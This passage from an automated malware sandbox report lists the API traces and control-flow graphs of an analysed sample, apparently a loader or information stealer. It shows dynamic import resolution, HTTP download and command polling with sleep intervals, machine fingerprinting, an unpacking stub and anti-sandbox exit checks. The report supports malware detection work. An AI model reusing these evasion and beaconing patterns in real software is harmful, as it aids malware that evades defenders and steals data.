                                        • LoadLibraryA.KERNEL32(0085FA40,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                        • LoadLibraryA.KERNEL32(0085FB48,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                        • LoadLibraryA.KERNEL32(0085FAA0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                        • LoadLibraryA.KERNEL32(0085FB78,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                        • GetProcAddress.KERNEL32(75290000,00853148), ref: 0041A0DA
                                        • GetProcAddress.KERNEL32(75290000,0085FB90), ref: 0041A0F2
                                        • GetProcAddress.KERNEL32(75290000,0085A188), ref: 0041A10A
                                        • GetProcAddress.KERNEL32(75290000,0085FBA8), ref: 0041A123
                                        • GetProcAddress.KERNEL32(75290000,008530E8), ref: 0041A13B
                                        • GetProcAddress.KERNEL32(73440000,0085CA08), ref: 0041A160
                                        • GetProcAddress.KERNEL32(73440000,00853168), ref: 0041A179
                                        • GetProcAddress.KERNEL32(73440000,0085C878), ref: 0041A191
                                        • GetProcAddress.KERNEL32(73440000,0085FBC0), ref: 0041A1A9
                                        • GetProcAddress.KERNEL32(73440000,0085FBF0), ref: 0041A1C2
                                        • GetProcAddress.KERNEL32(73440000,008533E8), ref: 0041A1DA
                                        • GetProcAddress.KERNEL32(73440000,008531E8), ref: 0041A1F2
                                        • GetProcAddress.KERNEL32(73440000,0085FC38), ref: 0041A20B
                                        • GetProcAddress.KERNEL32(752C0000,00853208), ref: 0041A22C
                                        • GetProcAddress.KERNEL32(752C0000,00853228), ref: 0041A244
                                        • GetProcAddress.KERNEL32(752C0000,0085FC50), ref: 0041A25D
                                        • GetProcAddress.KERNEL32(752C0000,0085FC68), ref: 0041A275
                                        • GetProcAddress.KERNEL32(752C0000,00853348), ref: 0041A28D
                                        • GetProcAddress.KERNEL32(74EC0000,0085CAD0), ref: 0041A2B3
                                        • GetProcAddress.KERNEL32(74EC0000,0085C6E8), ref: 0041A2CB
                                        • GetProcAddress.KERNEL32(74EC0000,0085FCE0), ref: 0041A2E3
                                        • GetProcAddress.KERNEL32(74EC0000,008533C8), ref: 0041A2FC
                                        • GetProcAddress.KERNEL32(74EC0000,008532A8), ref: 0041A314
                                        • GetProcAddress.KERNEL32(74EC0000,0085C850), ref: 0041A32C
                                        • GetProcAddress.KERNEL32(75BD0000,0085FC80), ref: 0041A352
                                        • GetProcAddress.KERNEL32(75BD0000,00853048), ref: 0041A36A
                                        • GetProcAddress.KERNEL32(75BD0000,0085A108), ref: 0041A382
                                        • GetProcAddress.KERNEL32(75BD0000,0085FC20), ref: 0041A39B
                                        • GetProcAddress.KERNEL32(75BD0000,0085FC98), ref: 0041A3B3
                                        • GetProcAddress.KERNEL32(75BD0000,00853068), ref: 0041A3CB
                                        • GetProcAddress.KERNEL32(75BD0000,00853288), ref: 0041A3E4
                                        • GetProcAddress.KERNEL32(75BD0000,0085FCB0), ref: 0041A3FC
                                        • GetProcAddress.KERNEL32(75BD0000,0085FCC8), ref: 0041A414
                                        • GetProcAddress.KERNEL32(75A70000,00853408), ref: 0041A436
                                        • GetProcAddress.KERNEL32(75A70000,008602C8), ref: 0041A44E
                                        • GetProcAddress.KERNEL32(75A70000,00860238), ref: 0041A466
                                        • GetProcAddress.KERNEL32(75A70000,008602F8), ref: 0041A47F
                                        • GetProcAddress.KERNEL32(75A70000,00860160), ref: 0041A497
                                        • GetProcAddress.KERNEL32(75450000,008531A8), ref: 0041A4B8
                                        • GetProcAddress.KERNEL32(75450000,00853428), ref: 0041A4D1
                                        • GetProcAddress.KERNEL32(75DA0000,00853248), ref: 0041A4F2
                                        • GetProcAddress.KERNEL32(75DA0000,00860040), ref: 0041A50A
                                        • GetProcAddress.KERNEL32(6F070000,00853188), ref: 0041A530
                                        • GetProcAddress.KERNEL32(6F070000,00853088), ref: 0041A548
                                        • GetProcAddress.KERNEL32(6F070000,008530A8), ref: 0041A560
                                        • GetProcAddress.KERNEL32(6F070000,008600E8), ref: 0041A579
                                        • GetProcAddress.KERNEL32(6F070000,008530C8), ref: 0041A591
                                        • GetProcAddress.KERNEL32(6F070000,00853308), ref: 0041A5A9
                                        • GetProcAddress.KERNEL32(6F070000,008531C8), ref: 0041A5C2
                                        • GetProcAddress.KERNEL32(6F070000,00853108), ref: 0041A5DA
                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                        • GetProcAddress.KERNEL32(75AF0000,00860178), ref: 0041A629
                                        • GetProcAddress.KERNEL32(75AF0000,0085A008), ref: 0041A641
                                        • GetProcAddress.KERNEL32(75AF0000,00860280), ref: 0041A659
                                        • GetProcAddress.KERNEL32(75AF0000,00860130), ref: 0041A672
                                        • GetProcAddress.KERNEL32(75D90000,008532C8), ref: 0041A693
                                        • GetProcAddress.KERNEL32(6E380000,00860190), ref: 0041A6B4
                                        • GetProcAddress.KERNEL32(6E380000,00853128), ref: 0041A6CD
                                        • GetProcAddress.KERNEL32(6E380000,008600A0), ref: 0041A6E5
                                        • GetProcAddress.KERNEL32(6E380000,008601D8), ref: 0041A6FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                        • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                        • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                        • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1029 406528-40652d 1010->1029 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1015 40635a 1012->1015 1016 40634e-406358 1012->1016 1013->1010 1018 406364-406392 HttpOpenRequestA 1015->1018 1016->1018 1020 4064f5-4064f9 InternetCloseHandle 1018->1020 1021 406398-40639c 1018->1021 1020->1013 1023 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1021->1023 1024 40639e-4063bf InternetSetOptionA 1021->1024 1026 406407-406427 call 41a740 call 41a800 * 2 1023->1026 1027 40642c-40644b call 418940 1023->1027 1024->1023 1026->1029 1034 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1034 1035 40644d-406454 1027->1035 1034->1029 1038 406456-406480 InternetReadFile 1035->1038 1039 4064c7-4064ef InternetCloseHandle 1035->1039 1042 406482-406489 1038->1042 1043 40648b 1038->1043 1039->1020 1042->1043 1047 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1042->1047 1043->1039 1047->1038
                                        APIs
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • StrCmpCA.SHLWAPI(?,00861C98), ref: 00406303
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • HttpOpenRequestA.WININET(00000000,GET,?,00861180,00000000,00000000,00400100,00000000), ref: 00406385
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                        • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                        • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                        • InternetCloseHandle.WININET(00000000), ref: 00406503
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3074848878-2509457195
                                        • Opcode ID: d85a552fd9e4acac8e34b401b6e4b932370d5aaf45a54204389b56e09165293c
                                        • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                        • Opcode Fuzzy Hash: d85a552fd9e4acac8e34b401b6e4b932370d5aaf45a54204389b56e09165293c
                                        • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1068 411817-41181a 1067->1068 1069 41199e-4119bd strtok_s 1067->1069 1071 411821-411830 call 41a820 1068->1071 1072 411849-411858 call 41a820 1068->1072 1073 4118ad-4118be StrCmpCA 1068->1073 1074 4118cf-4118e0 StrCmpCA 1068->1074 1075 41198f-411999 call 41a820 1068->1075 1076 4118f1-411902 StrCmpCA 1068->1076 1077 411951-411962 StrCmpCA 1068->1077 1078 411970-411981 StrCmpCA 1068->1078 1079 411913-411924 StrCmpCA 1068->1079 1080 411932-411943 StrCmpCA 1068->1080 1081 411835-411844 call 41a820 1068->1081 1082 41185d-41186e StrCmpCA 1068->1082 1083 41187f-411890 StrCmpCA 1068->1083 1069->1065 1071->1069 1072->1069 1099 4118c0-4118c3 1073->1099 1100 4118ca 1073->1100 1101 4118e2-4118e5 1074->1101 1102 4118ec 1074->1102 1075->1069 1103 411904-411907 1076->1103 1104 41190e 1076->1104 1087 411964-411967 1077->1087 1088 41196e 1077->1088 1090 411983-411986 1078->1090 1091 41198d 1078->1091 1105 411930 1079->1105 1106 411926-411929 1079->1106 1085 411945-411948 1080->1085 1086 41194f 1080->1086 1081->1069 1095 411870-411873 1082->1095 1096 41187a 1082->1096 1097 411892-41189c 1083->1097 1098 41189e-4118a1 1083->1098 1085->1086 1086->1069 1087->1088 1088->1069 1090->1091 1091->1069 1095->1096 1096->1069 1110 4118a8 1097->1110 1098->1110 1099->1100 1100->1069 1101->1102 1102->1069 1103->1104 1104->1069 1105->1069 1106->1105 1110->1069
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcessstrtok_s
                                        • String ID: block
                                        • API String ID: 3407564107-2199623458
                                        • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                        • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                        • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                        • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1171 1170->1164 1171->1164 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1184->1291 1192 415872-415879 1185->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1185->1193 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1201 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1200->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1193 1222->1127 1223->1291 1271->1164 1296->1193
                                        APIs
                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0085A0F8,?,0042110C,?,00000000), ref: 0041A82B
                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                          • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                          • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                        • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleepstrtok
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3630751533-2791005934
                                        • Opcode ID: fd1a01593cb2d875cad321d2ad4ca039a3be032fc89c363eed062a1fd3f5cf62
                                        • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                        • Opcode Fuzzy Hash: fd1a01593cb2d875cad321d2ad4ca039a3be032fc89c363eed062a1fd3f5cf62
                                        • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1334 417619-417626 call 41a740 1333->1334 1335 417628-417658 wsprintfA call 41a740 1333->1335 1343 41767e-41768e 1334->1343 1335->1343
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                        • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                        • wsprintfA.USER32 ref: 00417640
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 3790021787-3809124531
                                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                        • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                        • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1344 22e003c-22e0047 1345 22e004c-22e0263 call 22e0a3f call 22e0e0f call 22e0d90 VirtualAlloc 1344->1345 1346 22e0049 1344->1346 1361 22e028b-22e0292 1345->1361 1362 22e0265-22e0289 call 22e0a69 1345->1362 1346->1345 1364 22e02a1-22e02b0 1361->1364 1366 22e02ce-22e03c2 VirtualProtect call 22e0cce call 22e0ce7 1362->1366 1364->1366 1367 22e02b2-22e02cc 1364->1367 1373 22e03d1-22e03e0 1366->1373 1367->1364 1374 22e0439-22e04b8 VirtualFree 1373->1374 1375 22e03e2-22e0437 call 22e0ce7 1373->1375 1377 22e04be-22e04cd 1374->1377 1378 22e05f4-22e05fe 1374->1378 1375->1373 1380 22e04d3-22e04dd 1377->1380 1381 22e077f-22e0789 1378->1381 1382 22e0604-22e060d 1378->1382 1380->1378 1386 22e04e3-22e0505 LoadLibraryA 1380->1386 1384 22e078b-22e07a3 1381->1384 1385 22e07a6-22e07b0 1381->1385 1382->1381 1387 22e0613-22e0637 1382->1387 1384->1385 1388 22e086e-22e08be LoadLibraryA 1385->1388 1389 22e07b6-22e07cb 1385->1389 1390 22e0517-22e0520 1386->1390 1391 22e0507-22e0515 1386->1391 1392 22e063e-22e0648 1387->1392 1396 22e08c7-22e08f9 1388->1396 1393 22e07d2-22e07d5 1389->1393 1394 22e0526-22e0547 1390->1394 1391->1394 1392->1381 1395 22e064e-22e065a 1392->1395 1397 22e07d7-22e07e0 1393->1397 1398 22e0824-22e0833 1393->1398 1399 22e054d-22e0550 1394->1399 1395->1381 1400 22e0660-22e066a 1395->1400 1401 22e08fb-22e0901 1396->1401 1402 22e0902-22e091d 1396->1402 1403 22e07e4-22e0822 1397->1403 1404 22e07e2 1397->1404 1408 22e0839-22e083c 1398->1408 1405 22e0556-22e056b 1399->1405 1406 22e05e0-22e05ef 1399->1406 1407 22e067a-22e0689 1400->1407 1401->1402 1403->1393 1404->1398 1409 22e056f-22e057a 1405->1409 1410 22e056d 1405->1410 1406->1380 1411 22e068f-22e06b2 1407->1411 1412 22e0750-22e077a 1407->1412 1408->1388 1413 22e083e-22e0847 1408->1413 1419 22e057c-22e0599 1409->1419 1420 22e059b-22e05bb 1409->1420 1410->1406 1414 22e06ef-22e06fc 1411->1414 1415 22e06b4-22e06ed 1411->1415 1412->1392 1416 22e084b-22e086c 1413->1416 1417 22e0849 1413->1417 1421 22e06fe-22e0748 1414->1421 1422 22e074b 1414->1422 1415->1414 1416->1408 1417->1388 1427 22e05bd-22e05db 1419->1427 1420->1427 1421->1422 1422->1407 1427->1399
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022E024D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID: cess$kernel32.dll
                                        • API String ID: 4275171209-1230238691
                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction ID: bc7de75c7c9427a50a3ef4041c81cc4394aa9b353f4eb711bf1bfea546b9a28d
                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction Fuzzy Hash: 93527A74A10229DFDB64CF98C984BACBBB1BF09304F5480D9E50EAB355DB70AA85DF14

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00859AD0), ref: 004198A1
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00859A40), ref: 004198BA
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00859AE8), ref: 004198D2
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00859A28), ref: 004198EA
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00859A58), ref: 00419903
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0085A078), ref: 0041991B
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008536A8), ref: 00419933
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008535A8), ref: 0041994C
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00859A70), ref: 00419964
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00859A88), ref: 0041997C
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0085A308), ref: 00419995
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0085A4B8), ref: 004199AD
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00853588), ref: 004199C5
                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0085A440), ref: 004199DE
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                          • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                          • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                          • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                          • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                          • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                          • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                          • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                          • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                        • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                          • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
